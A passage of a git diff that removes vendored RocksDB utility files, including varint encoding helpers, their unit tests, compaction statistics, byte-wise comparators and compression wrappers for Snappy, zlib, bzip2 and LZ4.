-  // unsigned char is 7 bits, uint32_t is 32 bits, need 5 unsigned char
-  auto p = GetVarint32Ptr(data, data + 5 /* limit */, &len);
-  return Slice(p, len);
-}
-
-inline Slice GetSliceUntil(Slice* slice, char delimiter) {
-  uint32_t len = 0;
-  for (len = 0; len < slice->size() && slice->data()[len] != delimiter; ++len) {
-    // nothing
-  }
-
-  Slice ret(slice->data(), len);
-  slice->remove_prefix(len + ((len < slice->size()) ? 1 : 0));
-  return ret;
-}
-
-template<class T>
-#ifdef ROCKSDB_UBSAN_RUN
-#if defined(__clang__)
-__attribute__((__no_sanitize__("alignment")))
-#elif defined(__GNUC__)
-__attribute__((__no_sanitize_undefined__))
-#endif
-#endif
-inline void PutUnaligned(T *memory, const T &value) {
-#if defined(PLATFORM_UNALIGNED_ACCESS_NOT_ALLOWED)
-  char *nonAlignedMemory = reinterpret_cast<char*>(memory);
-  memcpy(nonAlignedMemory, reinterpret_cast<const char*>(&value), sizeof(T));
-#else
-  *memory = value;
-#endif
-}
-
-template<class T>
-#ifdef ROCKSDB_UBSAN_RUN
-#if defined(__clang__)
-__attribute__((__no_sanitize__("alignment")))
-#elif defined(__GNUC__)
-__attribute__((__no_sanitize_undefined__))
-#endif
-#endif
-inline void GetUnaligned(const T *memory, T *value) {
-#if defined(PLATFORM_UNALIGNED_ACCESS_NOT_ALLOWED)
-  char *nonAlignedMemory = reinterpret_cast<char*>(value);
-  memcpy(nonAlignedMemory, reinterpret_cast<const char*>(memory), sizeof(T));
-#else
-  *value = *memory;
-#endif
-}
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/util/coding_test.cc b/thirdparty/rocksdb/util/coding_test.cc
deleted file mode 100644
index 49fb73d..0000000
--- a/thirdparty/rocksdb/util/coding_test.cc
+++ /dev/null
@@ -1,204 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include "util/coding.h"
-
-#include "util/testharness.h"
-
-namespace rocksdb {
-
-class Coding { };
-
-TEST(Coding, Fixed32) {
-  std::string s;
-  for (uint32_t v = 0; v < 100000; v++) {
-    PutFixed32(&s, v);
-  }
-
-  const char* p = s.data();
-  for (uint32_t v = 0; v < 100000; v++) {
-    uint32_t actual = DecodeFixed32(p);
-    ASSERT_EQ(v, actual);
-    p += sizeof(uint32_t);
-  }
-}
-
-TEST(Coding, Fixed64) {
-  std::string s;
-  for (int power = 0; power <= 63; power++) {
-    uint64_t v = static_cast<uint64_t>(1) << power;
-    PutFixed64(&s, v - 1);
-    PutFixed64(&s, v + 0);
-    PutFixed64(&s, v + 1);
-  }
-
-  const char* p = s.data();
-  for (int power = 0; power <= 63; power++) {
-    uint64_t v = static_cast<uint64_t>(1) << power;
-    uint64_t actual = 0;
-    actual = DecodeFixed64(p);
-    ASSERT_EQ(v-1, actual);
-    p += sizeof(uint64_t);
-
-    actual = DecodeFixed64(p);
-    ASSERT_EQ(v+0, actual);
-    p += sizeof(uint64_t);
-
-    actual = DecodeFixed64(p);
-    ASSERT_EQ(v+1, actual);
-    p += sizeof(uint64_t);
-  }
-}
-
-// Test that encoding routines generate little-endian encodings
-TEST(Coding, EncodingOutput) {
-  std::string dst;
-  PutFixed32(&dst, 0x04030201);
-  ASSERT_EQ(4U, dst.size());
-  ASSERT_EQ(0x01, static_cast<int>(dst[0]));
-  ASSERT_EQ(0x02, static_cast<int>(dst[1]));
-  ASSERT_EQ(0x03, static_cast<int>(dst[2]));
-  ASSERT_EQ(0x04, static_cast<int>(dst[3]));
-
-  dst.clear();
-  PutFixed64(&dst, 0x0807060504030201ull);
-  ASSERT_EQ(8U, dst.size());
-  ASSERT_EQ(0x01, static_cast<int>(dst[0]));
-  ASSERT_EQ(0x02, static_cast<int>(dst[1]));
-  ASSERT_EQ(0x03, static_cast<int>(dst[2]));
-  ASSERT_EQ(0x04, static_cast<int>(dst[3]));
-  ASSERT_EQ(0x05, static_cast<int>(dst[4]));
-  ASSERT_EQ(0x06, static_cast<int>(dst[5]));
-  ASSERT_EQ(0x07, static_cast<int>(dst[6]));
-  ASSERT_EQ(0x08, static_cast<int>(dst[7]));
-}
-
-TEST(Coding, Varint32) {
-  std::string s;
-  for (uint32_t i = 0; i < (32 * 32); i++) {
-    uint32_t v = (i / 32) << (i % 32);
-    PutVarint32(&s, v);
-  }
-
-  const char* p = s.data();
-  const char* limit = p + s.size();
-  for (uint32_t i = 0; i < (32 * 32); i++) {
-    uint32_t expected = (i / 32) << (i % 32);
-    uint32_t actual = 0;
-    const char* start = p;
-    p = GetVarint32Ptr(p, limit, &actual);
-    ASSERT_TRUE(p != nullptr);
-    ASSERT_EQ(expected, actual);
-    ASSERT_EQ(VarintLength(actual), p - start);
-  }
-  ASSERT_EQ(p, s.data() + s.size());
-}
-
-TEST(Coding, Varint64) {
-  // Construct the list of values to check
-  std::vector<uint64_t> values;
-  // Some special values
-  values.push_back(0);
-  values.push_back(100);
-  values.push_back(~static_cast<uint64_t>(0));
-  values.push_back(~static_cast<uint64_t>(0) - 1);
-  for (uint32_t k = 0; k < 64; k++) {
-    // Test values near powers of two
-    const uint64_t power = 1ull << k;
-    values.push_back(power);
-    values.push_back(power-1);
-    values.push_back(power+1);
-  };
-
-  std::string s;
-  for (unsigned int i = 0; i < values.size(); i++) {
-    PutVarint64(&s, values[i]);
-  }
-
-  const char* p = s.data();
-  const char* limit = p + s.size();
-  for (unsigned int i = 0; i < values.size(); i++) {
-    ASSERT_TRUE(p < limit);
-    uint64_t actual = 0;
-    const char* start = p;
-    p = GetVarint64Ptr(p, limit, &actual);
-    ASSERT_TRUE(p != nullptr);
-    ASSERT_EQ(values[i], actual);
-    ASSERT_EQ(VarintLength(actual), p - start);
-  }
-  ASSERT_EQ(p, limit);
-
-}
-
-TEST(Coding, Varint32Overflow) {
-  uint32_t result;
-  std::string input("\x81\x82\x83\x84\x85\x11");
-  ASSERT_TRUE(GetVarint32Ptr(input.data(), input.data() + input.size(), &result)
-              == nullptr);
-}
-
-TEST(Coding, Varint32Truncation) {
-  uint32_t large_value = (1u << 31) + 100;
-  std::string s;
-  PutVarint32(&s, large_value);
-  uint32_t result;
-  for (unsigned int len = 0; len < s.size() - 1; len++) {
-    ASSERT_TRUE(GetVarint32Ptr(s.data(), s.data() + len, &result) == nullptr);
-  }
-  ASSERT_TRUE(
-      GetVarint32Ptr(s.data(), s.data() + s.size(), &result) != nullptr);
-  ASSERT_EQ(large_value, result);
-}
-
-TEST(Coding, Varint64Overflow) {
-  uint64_t result;
-  std::string input("\x81\x82\x83\x84\x85\x81\x82\x83\x84\x85\x11");
-  ASSERT_TRUE(GetVarint64Ptr(input.data(), input.data() + input.size(), &result)
-              == nullptr);
-}
-
-TEST(Coding, Varint64Truncation) {
-  uint64_t large_value = (1ull << 63) + 100ull;
-  std::string s;
-  PutVarint64(&s, large_value);
-  uint64_t result;
-  for (unsigned int len = 0; len < s.size() - 1; len++) {
-    ASSERT_TRUE(GetVarint64Ptr(s.data(), s.data() + len, &result) == nullptr);
-  }
-  ASSERT_TRUE(
-      GetVarint64Ptr(s.data(), s.data() + s.size(), &result) != nullptr);
-  ASSERT_EQ(large_value, result);
-}
-
-TEST(Coding, Strings) {
-  std::string s;
-  PutLengthPrefixedSlice(&s, Slice(""));
-  PutLengthPrefixedSlice(&s, Slice("foo"));
-  PutLengthPrefixedSlice(&s, Slice("bar"));
-  PutLengthPrefixedSlice(&s, Slice(std::string(200, 'x')));
-
-  Slice input(s);
-  Slice v;
-  ASSERT_TRUE(GetLengthPrefixedSlice(&input, &v));
-  ASSERT_EQ("", v.ToString());
-  ASSERT_TRUE(GetLengthPrefixedSlice(&input, &v));
-  ASSERT_EQ("foo", v.ToString());
-  ASSERT_TRUE(GetLengthPrefixedSlice(&input, &v));
-  ASSERT_EQ("bar", v.ToString());
-  ASSERT_TRUE(GetLengthPrefixedSlice(&input, &v));
-  ASSERT_EQ(std::string(200, 'x'), v.ToString());
-  ASSERT_EQ("", input.ToString());
-}
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/util/compaction_job_stats_impl.cc b/thirdparty/rocksdb/util/compaction_job_stats_impl.cc
deleted file mode 100644
index 1787e83..0000000
--- a/thirdparty/rocksdb/util/compaction_job_stats_impl.cc
+++ /dev/null
@@ -1,86 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include "rocksdb/compaction_job_stats.h"
-
-namespace rocksdb {
-
-#ifndef ROCKSDB_LITE
-
-void CompactionJobStats::Reset() {
-  elapsed_micros = 0;
-
-  num_input_records = 0;
-  num_input_files = 0;
-  num_input_files_at_output_level = 0;
-
-  num_output_records = 0;
-  num_output_files = 0;
-
-  is_manual_compaction = 0;
-
-  total_input_bytes = 0;
-  total_output_bytes = 0;
-
-  num_records_replaced = 0;
-
-  total_input_raw_key_bytes = 0;
-  total_input_raw_value_bytes = 0;
-
-  num_input_deletion_records = 0;
-  num_expired_deletion_records = 0;
-
-  num_corrupt_keys = 0;
-
-  file_write_nanos = 0;
-  file_range_sync_nanos = 0;
-  file_fsync_nanos = 0;
-  file_prepare_write_nanos = 0;
-
-  num_single_del_fallthru = 0;
-  num_single_del_mismatch = 0;
-}
-
-void CompactionJobStats::Add(const CompactionJobStats& stats) {
-  elapsed_micros += stats.elapsed_micros;
-
-  num_input_records += stats.num_input_records;
-  num_input_files += stats.num_input_files;
-  num_input_files_at_output_level += stats.num_input_files_at_output_level;
-
-  num_output_records += stats.num_output_records;
-  num_output_files += stats.num_output_files;
-
-  total_input_bytes += stats.total_input_bytes;
-  total_output_bytes += stats.total_output_bytes;
-
-  num_records_replaced += stats.num_records_replaced;
-
-  total_input_raw_key_bytes += stats.total_input_raw_key_bytes;
-  total_input_raw_value_bytes += stats.total_input_raw_value_bytes;
-
-  num_input_deletion_records += stats.num_input_deletion_records;
-  num_expired_deletion_records += stats.num_expired_deletion_records;
-
-  num_corrupt_keys += stats.num_corrupt_keys;
-
-  file_write_nanos += stats.file_write_nanos;
-  file_range_sync_nanos += stats.file_range_sync_nanos;
-  file_fsync_nanos += stats.file_fsync_nanos;
-  file_prepare_write_nanos += stats.file_prepare_write_nanos;
-
-  num_single_del_fallthru += stats.num_single_del_fallthru;
-  num_single_del_mismatch += stats.num_single_del_mismatch;
-}
-
-#else
-
-void CompactionJobStats::Reset() {}
-
-void CompactionJobStats::Add(const CompactionJobStats& stats) {}
-
-#endif  // !ROCKSDB_LITE
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/util/comparator.cc b/thirdparty/rocksdb/util/comparator.cc
deleted file mode 100644
index f3148f7..0000000
--- a/thirdparty/rocksdb/util/comparator.cc
+++ /dev/null
@@ -1,130 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include <algorithm>
-#include <memory>
-#include <stdint.h>
-#include "rocksdb/comparator.h"
-#include "rocksdb/slice.h"
-#include "port/port.h"
-#include "util/logging.h"
-
-namespace rocksdb {
-
-Comparator::~Comparator() { }
-
-namespace {
-class BytewiseComparatorImpl : public Comparator {
- public:
-  BytewiseComparatorImpl() { }
-
-  virtual const char* Name() const override {
-    return "leveldb.BytewiseComparator";
-  }
-
-  virtual int Compare(const Slice& a, const Slice& b) const override {
-    return a.compare(b);
-  }
-
-  virtual bool Equal(const Slice& a, const Slice& b) const override {
-    return a == b;
-  }
-
-  virtual void FindShortestSeparator(std::string* start,
-                                     const Slice& limit) const override {
-    // Find length of common prefix
-    size_t min_length = std::min(start->size(), limit.size());
-    size_t diff_index = 0;
-    while ((diff_index < min_length) &&
-           ((*start)[diff_index] == limit[diff_index])) {
-      diff_index++;
-    }
-
-    if (diff_index >= min_length) {
-      // Do not shorten if one string is a prefix of the other
-    } else {
-      uint8_t start_byte = static_cast<uint8_t>((*start)[diff_index]);
-      uint8_t limit_byte = static_cast<uint8_t>(limit[diff_index]);
-      if (start_byte >= limit_byte) {
-        // Cannot shorten since limit is smaller than start or start is
-        // already the shortest possible.
-        return;
-      }
-      assert(start_byte < limit_byte);
-
-      if (diff_index < limit.size() - 1 || start_byte + 1 < limit_byte) {
-        (*start)[diff_index]++;
-        start->resize(diff_index + 1);
-      } else {
-        //     v
-        // A A 1 A A A
-        // A A 2
-        //
-        // Incrementing the current byte will make start bigger than limit, we
-        // will skip this byte, and find the first non 0xFF byte in start and
-        // increment it.
-        diff_index++;
-
-        while (diff_index < start->size()) {
-          // Keep moving until we find the first non 0xFF byte to
-          // increment it
-          if (static_cast<uint8_t>((*start)[diff_index]) <
-              static_cast<uint8_t>(0xff)) {
-            (*start)[diff_index]++;
-            start->resize(diff_index + 1);
-            break;
-          }
-          diff_index++;
-        }
-      }
-      assert(Compare(*start, limit) < 0);
-    }
-  }
-
-  virtual void FindShortSuccessor(std::string* key) const override {
-    // Find first character that can be incremented
-    size_t n = key->size();
-    for (size_t i = 0; i < n; i++) {
-      const uint8_t byte = (*key)[i];
-      if (byte != static_cast<uint8_t>(0xff)) {
-        (*key)[i] = byte + 1;
-        key->resize(i+1);
-        return;
-      }
-    }
-    // *key is a run of 0xffs.  Leave it alone.
-  }
-};
-
-class ReverseBytewiseComparatorImpl : public BytewiseComparatorImpl {
- public:
-  ReverseBytewiseComparatorImpl() { }
-
-  virtual const char* Name() const override {
-    return "rocksdb.ReverseBytewiseComparator";
-  }
-
-  virtual int Compare(const Slice& a, const Slice& b) const override {
-    return -a.compare(b);
-  }
-};
-
-}// namespace
-
-const Comparator* BytewiseComparator() {
-  static BytewiseComparatorImpl bytewise;
-  return &bytewise;
-}
-
-const Comparator* ReverseBytewiseComparator() {
-  static ReverseBytewiseComparatorImpl rbytewise;
-  return &rbytewise;
-}
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/util/compression.h b/thirdparty/rocksdb/util/compression.h
deleted file mode 100644
index 468b961..0000000
--- a/thirdparty/rocksdb/util/compression.h
+++ /dev/null
@@ -1,791 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-//
-#pragma once
-
-#include <algorithm>
-#include <limits>
-#include <string>
-
-#include "rocksdb/options.h"
-#include "util/coding.h"
-
-#ifdef SNAPPY
-#include <snappy.h>
-#endif
-
-#ifdef ZLIB
-#include <zlib.h>
-#endif
-
-#ifdef BZIP2
-#include <bzlib.h>
-#endif
-
-#if defined(LZ4)
-#include <lz4.h>
-#include <lz4hc.h>
-#endif
-
-#if defined(ZSTD)
-#include <zstd.h>
-#endif
-
-#if defined(XPRESS)
-#include "port/xpress.h"
-#endif
-
-namespace rocksdb {
-
-inline bool Snappy_Supported() {
-#ifdef SNAPPY
-  return true;
-#endif
-  return false;
-}
-
-inline bool Zlib_Supported() {
-#ifdef ZLIB
-  return true;
-#endif
-  return false;
-}
-
-inline bool BZip2_Supported() {
-#ifdef BZIP2
-  return true;
-#endif
-  return false;
-}
-
-inline bool LZ4_Supported() {
-#ifdef LZ4
-  return true;
-#endif
-  return false;
-}
-
-inline bool XPRESS_Supported() {
-#ifdef XPRESS
-  return true;
-#endif
-  return false;
-}
-
-inline bool ZSTD_Supported() {
-#ifdef ZSTD
-  // ZSTD format is finalized since version 0.8.0.
-  return (ZSTD_versionNumber() >= 800);
-#endif
-  return false;
-}
-
-inline bool ZSTDNotFinal_Supported() {
-#ifdef ZSTD
-  return true;
-#endif
-  return false;
-}
-
-inline bool CompressionTypeSupported(CompressionType compression_type) {
-  switch (compression_type) {
-    case kNoCompression:
-      return true;
-    case kSnappyCompression:
-      return Snappy_Supported();
-    case kZlibCompression:
-      return Zlib_Supported();
-    case kBZip2Compression:
-      return BZip2_Supported();
-    case kLZ4Compression:
-      return LZ4_Supported();
-    case kLZ4HCCompression:
-      return LZ4_Supported();
-    case kXpressCompression:
-      return XPRESS_Supported();
-    case kZSTDNotFinalCompression:
-      return ZSTDNotFinal_Supported();
-    case kZSTD:
-      return ZSTD_Supported();
-    default:
-      assert(false);
-      return false;
-  }
-}
-
-inline std::string CompressionTypeToString(CompressionType compression_type) {
-  switch (compression_type) {
-    case kNoCompression:
-      return "NoCompression";
-    case kSnappyCompression:
-      return "Snappy";
-    case kZlibCompression:
-      return "Zlib";
-    case kBZip2Compression:
-      return "BZip2";
-    case kLZ4Compression:
-      return "LZ4";
-    case kLZ4HCCompression:
-      return "LZ4HC";
-    case kXpressCompression:
-      return "Xpress";
-    case kZSTD:
-    case kZSTDNotFinalCompression:
-      return "ZSTD";
-    default:
-      assert(false);
-      return "";
-  }
-}
-
-// compress_format_version can have two values:
-// 1 -- decompressed sizes for BZip2 and Zlib are not included in the compressed
-// block. Also, decompressed sizes for LZ4 are encoded in platform-dependent
-// way.
-// 2 -- Zlib, BZip2 and LZ4 encode decompressed size as Varint32 just before the
-// start of compressed block. Snappy format is the same as version 1.
-
-inline bool Snappy_Compress(const CompressionOptions& opts, const char* input,
-                            size_t length, ::std::string* output) {
-#ifdef SNAPPY
-  output->resize(snappy::MaxCompressedLength(length));
-  size_t outlen;
-  snappy::RawCompress(input, length, &(*output)[0], &outlen);
-  output->resize(outlen);
-  return true;
-#endif
-
-  return false;
-}
-
-inline bool Snappy_GetUncompressedLength(const char* input, size_t length,
-                                         size_t* result) {
-#ifdef SNAPPY
-  return snappy::GetUncompressedLength(input, length, result);
-#else
-  return false;
-#endif
-}
-
-inline bool Snappy_Uncompress(const char* input, size_t length,
-                              char* output) {
-#ifdef SNAPPY
-  return snappy::RawUncompress(input, length, output);
-#else
-  return false;
-#endif
-}
-
-namespace compression {
-// returns size
-inline size_t PutDecompressedSizeInfo(std::string* output, uint32_t length) {
-  PutVarint32(output, length);
-  return output->size();
-}
-
-inline bool GetDecompressedSizeInfo(const char** input_data,
-                                    size_t* input_length,
-                                    uint32_t* output_len) {
-  auto new_input_data =
-      GetVarint32Ptr(*input_data, *input_data + *input_length, output_len);
-  if (new_input_data == nullptr) {
-    return false;
-  }
-  *input_length -= (new_input_data - *input_data);
-  *input_data = new_input_data;
-  return true;
-}
-}  // namespace compression
-
-// compress_format_version == 1 -- decompressed size is not included in the
-// block header
-// compress_format_version == 2 -- decompressed size is included in the block
-// header in varint32 format
-// @param compression_dict Data for presetting the compression library's
-//    dictionary.
-inline bool Zlib_Compress(const CompressionOptions& opts,
-                          uint32_t compress_format_version, const char* input,
-                          size_t length, ::std::string* output,
-                          const Slice& compression_dict = Slice()) {
-#ifdef ZLIB
-  if (length > std::numeric_limits<uint32_t>::max()) {
-    // Can't compress more than 4GB
-    return false;
-  }
-
-  size_t output_header_len = 0;
-  if (compress_format_version == 2) {
-    output_header_len = compression::PutDecompressedSizeInfo(
-        output, static_cast<uint32_t>(length));
-  }
-  // Resize output to be the plain data length.
-  // This may not be big enough if the compression actually expands data.
-  output->resize(output_header_len + length);
-
-  // The memLevel parameter specifies how much memory should be allocated for
-  // the internal compression state.
-  // memLevel=1 uses minimum memory but is slow and reduces compression ratio.
-  // memLevel=9 uses maximum memory for optimal speed.
-  // The default value is 8. See zconf.h for more details.
-  static const int memLevel = 8;
-  z_stream _stream;
-  memset(&_stream, 0, sizeof(z_stream));
-  int st = deflateInit2(&_stream, opts.level, Z_DEFLATED, opts.window_bits,
-                        memLevel, opts.strategy);
-  if (st != Z_OK) {
-    return false;
-  }
-
-  if (compression_dict.size()) {
-    // Initialize the compression library's dictionary
-    st = deflateSetDictionary(
-        &_stream, reinterpret_cast<const Bytef*>(compression_dict.data()),
-        static_cast<unsigned int>(compression_dict.size()));
-    if (st != Z_OK) {
-      deflateEnd(&_stream);
-      return false;
-    }
-  }
-
-  // Compress the input, and put compressed data in output.
-  _stream.next_in = (Bytef *)input;
-  _stream.avail_in = static_cast<unsigned int>(length);
-
-  // Initialize the output size.
-  _stream.avail_out = static_cast<unsigned int>(length);
-  _stream.next_out = reinterpret_cast<Bytef*>(&(*output)[output_header_len]);
-
-  bool compressed = false;
-  st = deflate(&_stream, Z_FINISH);
-  if (st == Z_STREAM_END) {
-    compressed = true;
-    output->resize(output->size() - _stream.avail_out);
-  }
-  // The only return value we really care about is Z_STREAM_END.
-  // Z_OK means insufficient output space. This means the compression is
-  // bigger than decompressed size. Just fail the compression in that case.
-
-  deflateEnd(&_stream);
-  return compressed;
-#endif
-  return false;
-}
-
-// compress_format_version == 1 -- decompressed size is not included in the
-// block header
-// compress_format_version == 2 -- decompressed size is included in the block
-// header in varint32 format
-// @param compression_dict Data for presetting the compression library's
-//    dictionary.
-inline char* Zlib_Uncompress(const char* input_data, size_t input_length,
-                             int* decompress_size,
-                             uint32_t compress_format_version,
-                             const Slice& compression_dict = Slice(),
-                             int windowBits = -14) {
-#ifdef ZLIB
-  uint32_t output_len = 0;
-  if (compress_format_version == 2) {
-    if (!compression::GetDecompressedSizeInfo(&input_data, &input_length,
-                                              &output_len)) {
-      return nullptr;
-    }
-  } else {
-    // Assume the decompressed data size will 5x of compressed size, but round
-    // to the page size
-    size_t proposed_output_len = ((input_length * 5) & (~(4096 - 1))) + 4096;
-    output_len = static_cast<uint32_t>(
-        std::min(proposed_output_len,
-                 static_cast<size_t>(std::numeric_limits<uint32_t>::max())));
-  }
-
-  z_stream _stream;
-  memset(&_stream, 0, sizeof(z_stream));
-
-  // For raw inflate, the windowBits should be -8..-15.
-  // If windowBits is bigger than zero, it will use either zlib
-  // header or gzip header. Adding 32 to it will do automatic detection.
-  int st = inflateInit2(&_stream,
-      windowBits > 0 ? windowBits + 32 : windowBits);
-  if (st != Z_OK) {
-    return nullptr;
-  }
-
-  if (compression_dict.size()) {
-    // Initialize the compression library's dictionary
-    st = inflateSetDictionary(
-        &_stream, reinterpret_cast<const Bytef*>(compression_dict.data()),
-        static_cast<unsigned int>(compression_dict.size()));
-    if (st != Z_OK) {
-      return nullptr;
-    }
-  }
-
-  _stream.next_in = (Bytef *)input_data;
-  _stream.avail_in = static_cast<unsigned int>(input_length);
-
-  char* output = new char[output_len];
-
-  _stream.next_out = (Bytef *)output;
-  _stream.avail_out = static_cast<unsigned int>(output_len);
-
-  bool done = false;
-  while (!done) {
-    st = inflate(&_stream, Z_SYNC_FLUSH);
-    switch (st) {
-      case Z_STREAM_END:
-        done = true;
-        break;
-      case Z_OK: {
-        // No output space. Increase the output space by 20%.
-        // We should never run out of output space if
-        // compress_format_version == 2
-        assert(compress_format_version != 2);
-        size_t old_sz = output_len;
-        uint32_t output_len_delta = output_len/5;
-        output_len += output_len_delta < 10 ? 10 : output_len_delta;
-        char* tmp = new char[output_len];
-        memcpy(tmp, output, old_sz);
-        delete[] output;
-        output = tmp;
-
-        // Set more output.
-        _stream.next_out = (Bytef *)(output + old_sz);
-        _stream.avail_out = static_cast<unsigned int>(output_len - old_sz);
-        break;
-      }
-      case Z_BUF_ERROR:
-      default:
-        delete[] output;
-        inflateEnd(&_stream);
-        return nullptr;
-    }
-  }
-
-  // If we encoded decompressed block size, we should have no bytes left
-  assert(compress_format_version != 2 || _stream.avail_out == 0);
-  *decompress_size = static_cast<int>(output_len - _stream.avail_out);
-  inflateEnd(&_stream);
-  return output;
-#endif
-
-  return nullptr;
-}
-
-// compress_format_version == 1 -- decompressed size is not included in the
-// block header
-// compress_format_version == 2 -- decompressed size is included in the block
-// header in varint32 format
-inline bool BZip2_Compress(const CompressionOptions& opts,
-                           uint32_t compress_format_version,
-                           const char* input, size_t length,
-                           ::std::string* output) {
-#ifdef BZIP2
-  if (length > std::numeric_limits<uint32_t>::max()) {
-    // Can't compress more than 4GB
-    return false;
-  }
-  size_t output_header_len = 0;
-  if (compress_format_version == 2) {
-    output_header_len = compression::PutDecompressedSizeInfo(
-        output, static_cast<uint32_t>(length));
-  }
-  // Resize output to be the plain data length.
-  // This may not be big enough if the compression actually expands data.
-  output->resize(output_header_len + length);
-
-
-  bz_stream _stream;
-  memset(&_stream, 0, sizeof(bz_stream));
-
-  // Block size 1 is 100K.
-  // 0 is for silent.
-  // 30 is the default workFactor
-  int st = BZ2_bzCompressInit(&_stream, 1, 0, 30);
-  if (st != BZ_OK) {
-    return false;
-  }
-
-  // Compress the input, and put compressed data in output.
-  _stream.next_in = (char *)input;
-  _stream.avail_in = static_cast<unsigned int>(length);
-
-  // Initialize the output size.
-  _stream.avail_out = static_cast<unsigned int>(length);
-  _stream.next_out = reinterpret_cast<char*>(&(*output)[output_header_len]);
-
-  bool compressed = false;
-  st = BZ2_bzCompress(&_stream, BZ_FINISH);
-  if (st == BZ_STREAM_END) {
-    compressed = true;
-    output->resize(output->size() - _stream.avail_out);
-  }
-  // The only return value we really care about is BZ_STREAM_END.
-  // BZ_FINISH_OK means insufficient output space. This means the compression
-  // is bigger than decompressed size. Just fail the compression in that case.
-
-  BZ2_bzCompressEnd(&_stream);
-  return compressed;
-#endif
-  return false;
-}
-
-// compress_format_version == 1 -- decompressed size is not included in the
-// block header
-// compress_format_version == 2 -- decompressed size is included in the block
-// header in varint32 format
-inline char* BZip2_Uncompress(const char* input_data, size_t input_length,
-                              int* decompress_size,
-                              uint32_t compress_format_version) {
-#ifdef BZIP2
-  uint32_t output_len = 0;
-  if (compress_format_version == 2) {
-    if (!compression::GetDecompressedSizeInfo(&input_data, &input_length,
-                                              &output_len)) {
-      return nullptr;
-    }
-  } else {
-    // Assume the decompressed data size will 5x of compressed size, but round
-    // to the next page size
-    size_t proposed_output_len = ((input_length * 5) & (~(4096 - 1))) + 4096;
-    output_len = static_cast<uint32_t>(
-        std::min(proposed_output_len,
-                 static_cast<size_t>(std::numeric_limits<uint32_t>::max())));
-  }
-
-  bz_stream _stream;
-  memset(&_stream, 0, sizeof(bz_stream));
-
-  int st = BZ2_bzDecompressInit(&_stream, 0, 0);
-  if (st != BZ_OK) {
-    return nullptr;
-  }
-
-  _stream.next_in = (char *)input_data;
-  _stream.avail_in = static_cast<unsigned int>(input_length);
-
-  char* output = new char[output_len];
-
-  _stream.next_out = (char *)output;
-  _stream.avail_out = static_cast<unsigned int>(output_len);
-
-  bool done = false;
-  while (!done) {
-    st = BZ2_bzDecompress(&_stream);
-    switch (st) {
-      case BZ_STREAM_END:
-        done = true;
-        break;
-      case BZ_OK: {
-        // No output space. Increase the output space by 20%.
-        // We should never run out of output space if
-        // compress_format_version == 2
-        assert(compress_format_version != 2);
-        uint32_t old_sz = output_len;
-        output_len = output_len * 1.2;
-        char* tmp = new char[output_len];
-        memcpy(tmp, output, old_sz);
-        delete[] output;
-        output = tmp;
-
-        // Set more output.
-        _stream.next_out = (char *)(output + old_sz);
-        _stream.avail_out = static_cast<unsigned int>(output_len - old_sz);
-        break;
-      }
-      default:
-        delete[] output;
-        BZ2_bzDecompressEnd(&_stream);
-        return nullptr;
-    }
-  }
-
-  // If we encoded decompressed block size, we should have no bytes left
-  assert(compress_format_version != 2 || _stream.avail_out == 0);
-  *decompress_size = static_cast<int>(output_len - _stream.avail_out);
-  BZ2_bzDecompressEnd(&_stream);
-  return output;
-#endif
-  return nullptr;
-}
-
-// compress_format_version == 1 -- decompressed size is included in the
-// block header using memcpy, which makes database non-portable)
-// compress_format_version == 2 -- decompressed size is included in the block
-// header in varint32 format
-// @param compression_dict Data for presetting the compression library's
-//    dictionary.
-inline bool LZ4_Compress(const CompressionOptions& opts,
-                         uint32_t compress_format_version, const char* input,
-                         size_t length, ::std::string* output,
-                         const Slice compression_dict = Slice()) {
-#ifdef LZ4
-  if (length > std::numeric_limits<uint32_t>::max()) {
-    // Can't compress more than 4GB
-    return false;
-  }
-
-  size_t output_header_len = 0;
-  if (compress_format_version == 2) {
-    // new encoding, using varint32 to store size information
-    output_header_len = compression::PutDecompressedSizeInfo(
-        output, static_cast<uint32_t>(length));
-  } else {
-    // legacy encoding, which is not really portable (depends on big/little
-    // endianness)
-    output_header_len = 8;
-    output->resize(output_header_len);
-    char* p = const_cast<char*>(output->c_str());
-    memcpy(p, &length, sizeof(length));
-  }
-  int compress_bound = LZ4_compressBound(static_cast<int>(length));
-  output->resize(static_cast<size_t>(output_header_len + compress_bound));
-
-  int outlen;
-#if LZ4_VERSION_NUMBER >= 10400  // r124+
-  LZ4_stream_t* stream = LZ4_createStream();
-  if (compression_dict.size()) {
-    LZ4_loadDict(stream, compression_dict.data(),
-                 static_cast<int>(compression_dict.size()));
-  }
-#if LZ4_VERSION_NUMBER >= 10700  // r129+
-  outlen = LZ4_compress_fast_continue(
-      stream, input, &(*output)[output_header_len], static_cast<int>(length),
-      compress_bound, 1);
-#else  // up to r128
-  outlen = LZ4_compress_limitedOutput_continue(
-      stream, input, &(*output)[output_header_len], static_cast<int>(length),
-      compress_bound);
-#endif
